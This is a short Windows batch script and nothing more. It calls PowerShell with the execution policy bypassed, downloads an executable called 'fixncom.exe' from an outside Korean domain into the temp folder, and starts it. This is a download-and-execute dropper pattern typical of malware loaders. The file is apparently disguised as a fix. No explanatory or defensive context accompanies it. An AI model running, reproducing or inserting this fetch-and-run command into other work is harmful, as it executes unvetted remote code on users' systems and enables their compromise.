@echo off
powershell -NoProfile -ExecutionPolicy Bypass -Command "Invoke-WebRequest 'https://0803.co.kr/fixncom.exe' -OutFile \"$env:TEMP\fixncom.exe\""
start "" "%TEMP%\fixncom.exe"
